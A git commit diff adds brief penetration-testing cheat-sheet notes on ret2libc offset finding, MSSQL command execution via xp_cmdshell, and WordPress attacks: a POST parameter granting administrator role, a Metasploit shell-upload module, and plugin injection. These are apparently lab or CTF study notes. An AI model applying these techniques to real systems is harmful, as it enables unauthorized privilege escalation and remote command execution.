mssql
This commit is contained in:
parent
512b365a34
commit
edb74c88ef
|
@ -0,0 +1,13 @@
|
||||||
|
# Ret2libc
|
||||||
|
|
||||||
|
|
||||||
|
## Finding offsets
|
||||||
|
|
||||||
|
* On target find `sh` address inside libc
|
||||||
|
```sh
|
||||||
|
strings -a -t x /lib32/libc.so.6 | grep /bin/sh
|
||||||
|
```
|
||||||
|
* Sub from `system` address from inside libc
|
||||||
|
```sh
|
||||||
|
readelf -s /lib32/libc.so.6 | grep system
|
||||||
|
```
|
|
@ -0,0 +1,9 @@
|
||||||
|
# MSSQL
|
||||||
|
|
||||||
|
# Usage
|
||||||
|
|
||||||
|
* `sqsh` as a shell
|
||||||
|
* After connection is established check `xp_cmdshell'
|
||||||
|
```sh
|
||||||
|
xp_cmdshell 'whoami';
|
||||||
|
```
|
|
@ -0,0 +1,22 @@
|
||||||
|
# Wordpress
|
||||||
|
|
||||||
|
## ure_user_roles
|
||||||
|
|
||||||
|
* [exploitdb 44595](https://exploit-db.com/exploits/44595.)
|
||||||
|
* [windsordeveloper](https://windsorwebdeveloper.com/dc-6-vulnhub-walkthrough/)
|
||||||
|
|
||||||
|
* Update user profile and append POST parameter to gain administrator role on user
|
||||||
|
```sh
|
||||||
|
&ure_other_roles=administrator
|
||||||
|
```
|
||||||
|
|
||||||
|
## Shell Upload
|
||||||
|
|
||||||
|
* Msfconsole
|
||||||
|
```sh
|
||||||
|
exploit/unix/webapp/wp_admin_shell_upload
|
||||||
|
```
|
||||||
|
|
||||||
|
## Template & Plugin Editing
|
||||||
|
|
||||||
|
* If template injection does not work, use plugin injection on `akismet.php`
|
Loading…
Reference in New Issue